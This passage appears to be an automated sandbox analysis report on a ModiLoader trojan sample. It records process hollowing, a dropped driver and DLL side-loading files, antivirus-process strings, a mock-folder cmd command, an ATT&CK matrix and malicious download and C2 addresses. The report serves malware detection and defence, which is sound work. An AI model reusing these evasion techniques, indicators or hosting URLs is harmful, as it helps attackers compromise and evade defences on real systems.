              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04221920 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_04221920
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04233990 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,0_2_04233990
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040F224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,11_2_040F224C
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040F1018 IsIconic,GetCapture,11_2_040F1018
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_0410319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,11_2_0410319C
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040FFCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,11_2_040FFCD8
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_041038CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,11_2_041038CC
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040F1920 IsIconic,SetWindowPos,GetWindowPlacement,11_2_040F1920
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_04103990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,11_2_04103990
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04238820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_04238820
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_0423245C
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,11_2_0410245C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeDropped PE file which has not been started: C:\Users\Public\Libraries\truesight.sysJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeAPI coverage: 7.4 %
              Source: C:\Users\Public\Libraries\Finqiaev.PIFAPI coverage: 5.4 %
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_041E5C18
              Source: Finqiaev.PIF, 00000009.00000003.1622819787.00000000009E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000648000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: veaiqniF.pif, 00000007.00000002.1792715961.000000002F6CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: veaiqniF.pif, 0000000A.00000002.1930922467.000000003B67C000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 0000000C.00000002.1972250429.000000002F84C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeAPI call chain: ExitProcess graph end nodegraph_0-59083
              Source: C:\Users\Public\Libraries\Finqiaev.PIFAPI call chain: ExitProcess graph end nodegraph_11-38449
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\veaiqniF.pifProcess queried: DebugPort
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_041FFCD8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeMemory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeMemory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 17CB0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFMemory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFMemory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 1DC10000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFMemory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFMemory allocated: C:\Users\Public\Libraries\veaiqniF.pif base: 17CB0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection unmapped: C:\Users\Public\Libraries\veaiqniF.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFSection unmapped: C:\Users\Public\Libraries\veaiqniF.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFSection unmapped: C:\Users\Public\Libraries\veaiqniF.pif base address: 400000Jump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeMemory written: C:\Users\Public\Libraries\veaiqniF.pif base: 2EF008Jump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFMemory written: C:\Users\Public\Libraries\veaiqniF.pif base: 2B5008Jump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFMemory written: C:\Users\Public\Libraries\veaiqniF.pif base: 2F6008Jump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pifJump to behavior
              Source: C:\Users\Public\Libraries\Finqiaev.PIFProcess created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pifJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_041E5DDC
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_041E5EE8
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: GetLocaleInfoA,0_2_041EB8C4
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: GetLocaleInfoA,0_2_041EB910
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_040B5DDC
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_040B5EE7
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: GetLocaleInfoA,11_2_040BB910
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041EA30C GetLocalTime,0_2_041EA30C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_042495F8 GetVersion,0_2_042495F8
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
              Source: veaiqniF.pif, 00000007.00000003.1549405621.000000002F746000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1546571683.000000002F746000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1549854697.000000002F74B000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1547015188.000000002F74B000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1551595238.000000002F77D000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1551595238.000000002F782000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1548484853.000000002F74B000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1551845640.000000002F765000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000002.1793010187.000000002F765000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000002.1793394496.000000002F782000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 00000007.00000003.1546456606.000000002F77D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
              Source: veaiqniF.pif, 0000000A.00000003.1737403086.000000003B6FF000.00000004.00000020.00020000.00000000.sdmp, veaiqniF.pif, 0000000A.00000003.1737194626.000000003B6FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Users\Public\Libraries\veaiqniF.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              1
              Valid Accounts
              21
              Windows Management Instrumentation
              1
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              1
              Valid Accounts
              2
              Obfuscated Files or Information
              LSASS Memory1
              System Network Connections Discovery
              Remote Desktop Protocol1
              Screen Capture
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Shared Modules
              1
              Valid Accounts
              1
              Access Token Manipulation
              2
              Software Packing
              Security Account Manager1
              File and Directory Discovery
              SMB/Windows Admin Shares11
              Input Capture
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Windows Service
              1
              Windows Service
              1
              Timestomp
              NTDS25
              System Information Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd1
              Registry Run Keys / Startup Folder
              311
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets151
              Security Software Discovery
              SSHKeylogging1
              Proxy
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder
              111
              Masquerading
              Cached Domain Credentials2
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Valid Accounts
              DCSync11
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              System Network Configuration Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1389143 Sample: qDKTsL1y44.exe Startdate: 08/02/2024 Architecture: WINDOWS Score: 100 42 web.fe.1drv.com 2->42 44 onedrive.live.com 2->44 46 8 other IPs or domains 2->46 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for dropped file 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 6 other signatures 2->60 9 qDKTsL1y44.exe 1 9 2->9         started        14 Finqiaev.PIF 2->14         started        16 Finqiaev.PIF 2->16         started        signatures3 process4 dnsIp5 52 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49705, 49706 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->52 34 C:\Users\Public\Libraries\veaiqniF.pif, PE32 9->34 dropped 36 C:\Users\Public\Libraries\truesight.sys, PE32+ 9->36 dropped 38 C:\Users\Public\Libraries\netutils.dll, PE32+ 9->38 dropped 40 3 other malicious files 9->40 dropped 68 Found Tor onion address 9->68 70 Drops PE files with a suspicious file extension 9->70 72 Writes to foreign memory regions 9->72 74 Sample is not signed and drops a device driver 9->74 18 veaiqniF.pif 9->18         started        22 cmd.exe 1 9->22         started        76 Multi AV Scanner detection for dropped file 14->76 78 Machine Learning detection for dropped file 14->78 80 Allocates memory in foreign processes 14->80 24 veaiqniF.pif 14->24         started        82 Sample uses process hollowing technique 16->82 26 veaiqniF.pif 16->26         started        file6 signatures7 process8 dnsIp9 48 ipinfo.io 34.117.186.192, 443, 49708, 49718 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 18->48 50 checkip.us-east-1.prod.check-ip.aws.a2z.com 54.145.184.72, 443, 49709, 49719 AMAZON-AESUS United States 18->50 62 Detected unpacking (changes PE section rights) 18->62 64 Detected unpacking (overwrites its own PE header) 18->64 66 Found Tor onion address 18->66 28 cmd.exe 2 22->28         started        30 conhost.exe 22->30         started        signatures10 process11 process12 32 conhost.exe 28->32         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              qDKTsL1y44.exe71%ReversingLabsWin32.Trojan.ModiLoader
              qDKTsL1y44.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\netutils.dll100%Joe Sandbox ML
              C:\Users\Public\Libraries\Finqiaev.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\Finqiaev.PIF71%ReversingLabsWin32.Trojan.ModiLoader
              C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
              C:\Users\Public\Libraries\netutils.dll79%ReversingLabsWin64.Trojan.Generic
              C:\Users\Public\Libraries\truesight.sys8%ReversingLabs
              C:\Users\Public\Libraries\veaiqniF.pif4%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              http://crl.microsoftq#0%Avira URL Cloudsafe
              http://severdops.ddns.net:2024100%Avira URL Cloudmalware
              http://www.pmail.com00%Avira URL Cloudsafe
              http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              dual-spov-0006.spov-msedge.net
              13.107.137.11
              truefalse
                unknown
                ipinfo.io
                34.117.186.192
                truefalse
                  high
                  checkip.us-east-1.prod.check-ip.aws.a2z.com
                  54.145.184.72
                  truefalse
                    high
                    onedrive.live.com
                    unknown
                    unknownfalse
                      high
                      checkip.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        6vq0og.dm.files.1drv.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://ipinfo.io/countryfalse
                            high
                            https://checkip.amazonaws.com/false
                              high
                              https://onedrive.live.com/download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpEfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://6vq0og.dm.files.1drv.com/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLRf0haFinqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://6vq0og.dm.files.1drv.com:443/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5WFinqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://6vq0og.dm.files.1drv.com:443/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLRFinqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://sectigo.com/CPS0qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
